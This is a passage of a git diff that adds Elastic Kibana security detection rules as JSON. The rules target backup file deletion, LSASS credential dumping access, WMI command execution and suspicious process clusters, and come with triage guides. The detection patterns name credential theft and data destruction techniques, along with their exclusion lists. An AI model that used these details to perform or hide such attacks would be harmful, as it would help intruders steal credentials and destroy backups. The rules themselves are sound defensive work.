"ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "11ea6bec-ebde-4d71-a8e9-784948f8e3e9", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Impact", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1490", + "name": "Inhibit System Recovery", + "reference": "https://attack.mitre.org/techniques/T1490/" + }, + { + "id": "T1485", + "name": "Data Destruction", + "reference": "https://attack.mitre.org/techniques/T1485/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "11ea6bec-ebde-4d71-a8e9-784948f8e3e9_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_112.json b/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_112.json new file mode 100644 index 00000000000..ac06a1cef65 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_112.json @@ -0,0 +1,112 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the deletion of backup files, saved using third-party software, by a process outside of the backup suite. Adversaries may delete Backup files to ensure that recovery from a ransomware attack is less likely.", + "false_positives": [ + "Certain utilities that delete files for disk cleanup or Administrators manually removing backup files." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.file-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Third-party Backup Files Deleted via Unexpected Process", + "note": "## Triage and analysis\n\n### Investigating Third-party Backup Files Deleted via Unexpected Process\n\nBackups are a significant obstacle for any ransomware operation. They allow the victim to resume business by performing data recovery, making them a valuable target.\n\nAttackers can delete backups from the host and gain access to backup servers to remove centralized backups for the environment, ensuring that victims have no alternatives to paying the ransom.\n\nThis rule identifies file deletions performed by a process that does not belong to the backup suite and aims to delete Veritas or Veeam backups.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if any files on the host machine have been encrypted.\n\n### False positive analysis\n\n- This rule can be triggered by the manual removal of backup files and by removal using other third-party tools that are not from the backup suite. Exceptions can be added for specific accounts and executables, preferably tied together.\n\n### Related rules\n\n- Deleting Backup Catalogs with Wbadmin - 581add16-df76-42bb-af8e-c979bfb39a59\n- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921\n- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4\n- Volume Shadow Copy Deletion via WMIC - dc9c1f74-dac3-48e3-b47f-eb79db358f57\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- Perform data recovery locally or restore the backups from replicated copies (Cloud, other servers, etc.).\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type == \"deletion\" and\n (\n /* Veeam Related Backup Files */\n (\n file.extension : (\"VBK\", \"VIB\", \"VBM\") and\n not (\n process.executable : (\"?:\\\\Windows\\\\*\", \"?:\\\\Program Files\\\\*\", \"?:\\\\Program Files (x86)\\\\*\") and\n (process.code_signature.trusted == true and process.code_signature.subject_name : (\"Veeam Software Group GmbH\", \"Veeam Software AG\"))\n )\n ) or\n /* Veritas Backup Exec Related Backup File */\n (\n file.extension : \"BKF\" and\n not process.executable : (\n \"?:\\\\Program Files\\\\Veritas\\\\Backup Exec\\\\*\",\n \"?:\\\\Program Files (x86)\\\\Veritas\\\\Backup Exec\\\\*\"\n )\n )\n ) and\n not (\n process.name : (\"MSExchangeMailboxAssistants.exe\", \"Microsoft.PowerBI.EnterpriseGateway.exe\") and\n (process.code_signature.subject_name : \"Microsoft Corporation\" and process.code_signature.trusted == true)\n ) and\n not file.path : (\n \"?:\\\\ProgramData\\\\Trend Micro\\\\*\",\n \"?:\\\\Program Files (x86)\\\\Trend Micro\\\\*\",\n \"?:\\\\$RECYCLE.BIN\\\\*\"\n )\n", + "references": [ + "https://www.advintel.io/post/backup-removal-solutions-from-conti-ransomware-with-love" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "11ea6bec-ebde-4d71-a8e9-784948f8e3e9", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Impact", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1490", + "name": "Inhibit System Recovery", + "reference": "https://attack.mitre.org/techniques/T1490/" + }, + { + "id": "T1485", + "name": "Data Destruction", + "reference": "https://attack.mitre.org/techniques/T1485/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 112 + }, + "id": "11ea6bec-ebde-4d71-a8e9-784948f8e3e9_112", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1224da6c-0326-4b4f-8454-68cdc5ae542b_3.json b/packages/security_detection_engine/kibana/security_rule/1224da6c-0326-4b4f-8454-68cdc5ae542b_3.json new file mode 100644 index 00000000000..071b155e449 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1224da6c-0326-4b4f-8454-68cdc5ae542b_3.json @@ -0,0 +1,66 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job combination has detected a set of one or more suspicious Windows processes with unusually high scores for malicious probability. These process(es) have been classified as malicious in several ways. The process(es) were predicted to be malicious by the ProblemChild supervised ML model. If the anomaly contains a cluster of suspicious processes, each process has the same user name, and the aggregate score of the event cluster was calculated to be unusually high by an unsupervised ML model. Such a cluster often contains suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules.", + "from": "now-45m", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "problem_child_high_sum_by_user", + "name": "Suspicious Windows Process Cluster Spawned by a User", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/problemchild", + "https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration" + ], + "related_integrations": [ + { + "package": "problemchild", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "risk_score": 21, + "rule_id": "1224da6c-0326-4b4f-8454-68cdc5ae542b", + "setup": "## Setup\n\nThe rule requires the Living off the Land (LotL) Attack Detection integration assets to be installed, as well as Windows process events collected by integrations such as Elastic Defend or Winlogbeat. \n\n### LotL Attack Detection Setup\nThe LotL Attack Detection integration detects living-off-the-land activity in Windows process events.\n\n#### Prerequisite Requirements:\n- Fleet is required for LotL Attack Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration or Winlogbeat(https://www.elastic.co/guide/en/beats/winlogbeat/current/_winlogbeat_overview.html).\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To set up and run Winlogbeat, follow [this](https://www.elastic.co/guide/en/beats/winlogbeat/current/winlogbeat-installation-configuration.html) guide.\n\n#### The following steps should be executed to install assets associated with the LotL Attack Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Living off the Land Attack Detection and select the integration to see more details about it.\n- Under Settings, click Install Living off the Land Attack Detection assets and follow the prompts to install the assets.\n\n#### Ingest Pipeline Setup\nBefore you can enable this rule, you'll need to enrich Windows process events with predictions from the Supervised LotL Attack Detection model. This is done via the ingest pipeline named `-problem_child_ingest_pipeline` installed with the LotL Attack Detection package.\n- If using an Elastic Beat such as Winlogbeat, add the LotL ingest pipeline to it by adding a simple configuration [setting](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#pipelines-for-beats) to `winlogbeat.yml`.\n- If adding the LotL ingest pipeline to an existing pipeline, use a [pipeline processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html).\n\n#### Adding Custom Mappings\n- Go to the Kibana homepage. Under Management, click Stack Management.\n- Under Data click Index Management and navigate to the Component Templates tab.\n- Templates that can be edited to add custom components will be marked with a @custom suffix. Edit the @custom component template corresponding to the beat/integration you added the LotL ingest pipeline to, by pasting the following JSON blob in the \"Load JSON\" flyout:\n```\n{\n \"properties\": {\n \"problemchild\": {\n \"properties\": {\n \"prediction\": {\n \"type\": \"long\"\n },\n \"prediction_probability\": {\n \"type\": \"float\"\n }\n }\n },\n \"blocklist_label\": {\n \"type\": \"long\"\n }\n }\n}\n```\n\n### Anomaly Detection Setup\nBefore you can enable this rule, you'll need to enable the corresponding Anomaly Detection job. \n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your enriched Windows process events. For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events, or `winlogbeat-*` if you used Winlogbeat.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/problemchild/kibana/ml_module/problemchild-ml.json) configuration file, you will see a card for \"Living off the Land Attack Detection\" under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection job and datafeed.\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Living off the Land Attack Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "1224da6c-0326-4b4f-8454-68cdc5ae542b_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1224da6c-0326-4b4f-8454-68cdc5ae542b_4.json b/packages/security_detection_engine/kibana/security_rule/1224da6c-0326-4b4f-8454-68cdc5ae542b_4.json new file mode 100644 index 00000000000..34f360e4b65 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1224da6c-0326-4b4f-8454-68cdc5ae542b_4.json @@ -0,0 +1,66 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job combination has detected a set of one or more suspicious Windows processes with unusually high scores for malicious probability. These process(es) have been classified as malicious in several ways. The process(es) were predicted to be malicious by the ProblemChild supervised ML model. If the anomaly contains a cluster of suspicious processes, each process has the same user name, and the aggregate score of the event cluster was calculated to be unusually high by an unsupervised ML model. Such a cluster often contains suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules.", + "from": "now-45m", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "problem_child_high_sum_by_user", + "name": "Suspicious Windows Process Cluster Spawned by a User", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/problemchild", + "https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration" + ], + "related_integrations": [ + { + "package": "problemchild", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "risk_score": 21, + "rule_id": "1224da6c-0326-4b4f-8454-68cdc5ae542b", + "setup": "## Setup\n\nThe rule requires the Living off the Land (LotL) Attack Detection integration assets to be installed, as well as Windows process events collected by integrations such as Elastic Defend or Winlogbeat. \n\n### LotL Attack Detection Setup\nThe LotL Attack Detection integration detects living-off-the-land activity in Windows process events.\n\n#### Prerequisite Requirements:\n- Fleet is required for LotL Attack Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration or Winlogbeat(https://www.elastic.co/guide/en/beats/winlogbeat/current/_winlogbeat_overview.html).\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To set up and run Winlogbeat, follow [this](https://www.elastic.co/guide/en/beats/winlogbeat/current/winlogbeat-installation-configuration.html) guide.\n\n#### The following steps should be executed to install assets associated with the LotL Attack Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Living off the Land Attack Detection and select the integration to see more details about it.\n- Under Settings, click Install Living off the Land Attack Detection assets and follow the prompts to install the assets.\n\n#### Ingest Pipeline Setup\n**Before you can enable this rule**, you'll need to enrich Windows process events with predictions from the Supervised LotL Attack Detection model. This is done via the ingest pipeline named `-problem_child_ingest_pipeline` installed with the LotL Attack Detection package.\n- If using an Elastic Beat such as Winlogbeat, add the LotL ingest pipeline to it by adding a simple configuration [setting](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#pipelines-for-beats) to `winlogbeat.yml`.\n- If adding the LotL ingest pipeline to an existing pipeline, use a [pipeline processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html). For example, you can check if your winlogbeat or Elastic Defend (the [default index pattern](https://docs.elastic.co/en/integrations/endpoint#logs) being `logs-endpoint*`) already has an ingest pipeline by navigating to `Data > Index Management`, finding the index (sometimes you need to toggle \"Include hidden indices\"), and checking the index's settings for a default or final [pipeline](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#set-default-pipeline).\n\n#### Adding Custom Mappings\n- Go to the Kibana homepage. Under Management, click Stack Management.\n- Under Data click Index Management and navigate to the Component Templates tab.\n- Templates that can be edited to add custom components will be marked with a @custom suffix. Edit the @custom component template corresponding to the beat/integration you added the LotL ingest pipeline to, by pasting the following JSON blob in the \"Load JSON\" flyout:\n```\n{\n \"properties\": {\n \"problemchild\": {\n \"properties\": {\n \"prediction\": {\n \"type\": \"long\"\n },\n \"prediction_probability\": {\n \"type\": \"float\"\n }\n }\n },\n \"blocklist_label\": {\n \"type\": \"long\"\n }\n }\n}\n```\n\n### Anomaly Detection Setup\n**Before you can enable this rule**, you'll need to enable the corresponding Anomaly Detection job. \n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your enriched Windows process events. For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events, or `winlogbeat-*` if you used Winlogbeat.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/problemchild/kibana/ml_module/problemchild-ml.json) configuration file, you will see a card for \"Living off the Land Attack Detection\" under \"Use preconfigured jobs\". Warning: if the ingest pipeline hasn't run for some reason, such as no eligible data in winlogbeat has come in yet, _you won't be able to see this card yet_. If that is the case, try troubleshooting the ingest pipeline, and if any ProblemChild predictions have been populated yet.\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection job and datafeed.\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Living off the Land Attack Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/" + } + ] + } + ], + "type": "machine_learning", + "version": 4 + }, + "id": "1224da6c-0326-4b4f-8454-68cdc5ae542b_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_107.json b/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_107.json new file mode 100644 index 00000000000..8ac4049c187 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_107.json @@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies access attempts to LSASS handle, this may indicate an attempt to dump credentials from Lsass memory.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Lsass Process Access", + "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\" and\n not winlog.event_data.GrantedAccess :\n (\"0x1000\", \"0x1400\", \"0x101400\", \"0x101000\", \"0x101001\", \"0x100000\", \"0x100040\", \"0x3200\", \"0x40\", \"0x3200\") and\n not process.name : (\"procexp64.exe\", \"procmon.exe\", \"procexp.exe\", \"Microsoft.Identity.AadConnect.Health.AadSync.Host.ex\") and\n not process.executable : (\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\*\",\n \"?:\\\\ProgramData\\\\WebEx\\\\webex\\\\*\",\n \"?:\\\\Program Files (x86)\\\\*\",\n \"?:\\\\Program Files\\\\*\",\n \"?:\\\\Windows\\\\CCM\\\\CcmExec.exe\",\n \"?:\\\\Windows\\\\LTSvc\\\\LTSVC.exe\",\n \"?:\\\\Windows\\\\Sysmon.exe\",\n \"?:\\\\Windows\\\\Sysmon64.exe\",\n \"?:\\\\Windows\\\\system32\\\\csrss.exe\",\n \"?:\\\\Windows\\\\System32\\\\lsm.exe\",\n \"?:\\\\Windows\\\\system32\\\\MRT.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\n \"?:\\\\Windows\\\\system32\\\\wininit.exe\",\n \"?:\\\\Windows\\\\SystemTemp\\\\GUM*.tmp\\\\GoogleUpdate.exe\",\n \"?:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe\"\n ) and\n not winlog.event_data.CallTrace : (\"*mpengine.dll*\", \"*appresolver.dll*\", \"*sysmain.dll*\")\n", + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.CallTrace", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.GrantedAccess", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetImage", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "128468bf-cab1-4637-99ea-fdf3780a4609", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "128468bf-cab1-4637-99ea-fdf3780a4609_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_110.json b/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_110.json new file mode 100644 index 00000000000..101e6551039 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_110.json @@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious command execution (cmd) via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Cmd Execution via WMI", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"WmiPrvSE.exe\" and process.name : \"cmd.exe\" and\n process.args : \"\\\\\\\\127.0.0.1\\\\*\" and process.args : (\"2>&1\", \"1>\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "12f07955-1674-44f7-86b5-c35da0a6f41a", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1047", + "name": "Windows Management Instrumentation", + "reference": "https://attack.mitre.org/techniques/T1047/" + }, + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "12f07955-1674-44f7-86b5-c35da0a6f41a_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_111.json b/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_111.json new file mode 100644 index 00000000000..1af3f353b3a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_111.json @@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious command execution (cmd) via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Cmd Execution via WMI", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"WmiPrvSE.exe\" and process.name : \"cmd.exe\" and\n process.args : \"\\\\\\\\127.0.0.1\\\\*\" and process.args : (\"2>&1\", \"1>\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "12f07955-1674-44f7-86b5-c35da0a6f41a", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1047", + "name": "Windows Management Instrumentation", + "reference": "https://attack.mitre.org/techniques/T1047/" + }, + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "12f07955-1674-44f7-86b5-c35da0a6f41a_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1327384f-00f3-44d5-9a8c-2373ba071e92_107.json b/packages/security_detection_engine/kibana/security_rule/1327384f-00f3-44d5-9a8c-2373ba071e92_107.json new file mode 100644 index 00000000000..ed866ad186e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1327384f-00f3-44d5-9a8c-2373ba071e92_107.json @@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A job can be used to schedule programs or scripts to be executed at a specified date and time. Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code.", + "false_positives": [ + "Legitimate scheduled jobs may be created during installation of new software." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via Scheduled Job Creation", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.path : \"?:\\\\Windows\\\\Tasks\\\\*\" and file.extension : \"job\" and\n not (\n (\n process.executable : \"?:\\\\Program 